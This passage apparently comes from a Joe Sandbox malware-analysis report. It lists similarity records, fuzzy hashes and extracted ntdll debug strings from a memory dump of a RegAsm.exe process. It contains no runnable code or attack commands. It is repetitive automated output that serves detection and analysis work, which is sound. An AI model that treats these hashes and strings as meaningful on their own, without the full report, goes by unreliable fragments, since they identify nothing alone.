                                                        • Opcode Fuzzy Hash: da4e4b4ebe5b72da253a905b196852cdada2e7e6e3dbf26d21486d0a023af180
                                                        • Instruction Fuzzy Hash: 4A900231261C1042D640B5684C15B07000587D0303F55D115B5154554DC91589A19921
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 404aa058fbb16f2ac188136d1b6efcdfb421f867518b1d1640eb5357a5c8e94e
                                                        • Instruction ID: 7e536e8e4aa5e1148e848d9bc47581326236768baf577a73e7924abfc33dbdce
                                                        • Opcode Fuzzy Hash: 404aa058fbb16f2ac188136d1b6efcdfb421f867518b1d1640eb5357a5c8e94e
                                                        • Instruction Fuzzy Hash: A790023125181402D540B1584809747000587D0302F55D011BA164555F8665C9D1A931
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c8d938a541ff6e23fc83d08ebc6c7ed182504b5125bec1bd0be20678fd785a7
                                                        • Instruction ID: d422e3f5caf89f05b1719549297e6e9ff10b6ba0039a16d7a9473a9d99e6eba3
                                                        • Opcode Fuzzy Hash: 8c8d938a541ff6e23fc83d08ebc6c7ed182504b5125bec1bd0be20678fd785a7
                                                        • Instruction Fuzzy Hash: B8900231651410424580B16888459074005ABE1211755D121B5998550E855989A59A65
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9924586cb410b77cb4d6e5b7d7164247e9e057c37468567c2548be834a1c43ab
                                                        • Instruction ID: e568da57d6717bdce0edce83634c564525111abca86b098a12976ea449de6a46
                                                        • Opcode Fuzzy Hash: 9924586cb410b77cb4d6e5b7d7164247e9e057c37468567c2548be834a1c43ab
                                                        • Instruction Fuzzy Hash: E890023125181402D540B158481570B000587D0302F55D011B6164555E86258991A971
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09f2c1e372bf623eea571df019edcee7da49c5cb86e7cf518eb9279ddc7cd4bd
                                                        • Instruction ID: bbbe96ca5a8cbfe1c83f158b68df5812debe587898ca54ab7e4cfc84f9f6ea79
                                                        • Opcode Fuzzy Hash: 09f2c1e372bf623eea571df019edcee7da49c5cb86e7cf518eb9279ddc7cd4bd
                                                        • Instruction Fuzzy Hash: 6B90047137141043D544F15C44057070045C7F1301F55D013F7154554DC53DCDF1D535
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29b3b979c2a63a5268f9216c34479eec7bfae3b447128ac530cb4d7fed26fd98
                                                        • Instruction ID: 19fcb5596df0f03b289309639773a11e981e8d0d8270c265d24ee16945f0cbe4
                                                        • Opcode Fuzzy Hash: 29b3b979c2a63a5268f9216c34479eec7bfae3b447128ac530cb4d7fed26fd98
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        Strings
                                                        • ExecuteOptions, xrefs: 02E746A0
                                                        • Execute=1, xrefs: 02E74713
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02E74742
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02E746FC
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 02E74787
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02E74725
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02E74655
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 02E7031E
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E702E7
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E702BD
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 02E77BAC
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02E77B7F
                                                        • RTL: Resource at %p, xrefs: 02E77B8E
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E7728C
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 02E772C1
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02E77294
                                                        • RTL: Resource at %p, xrefs: 02E772A3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280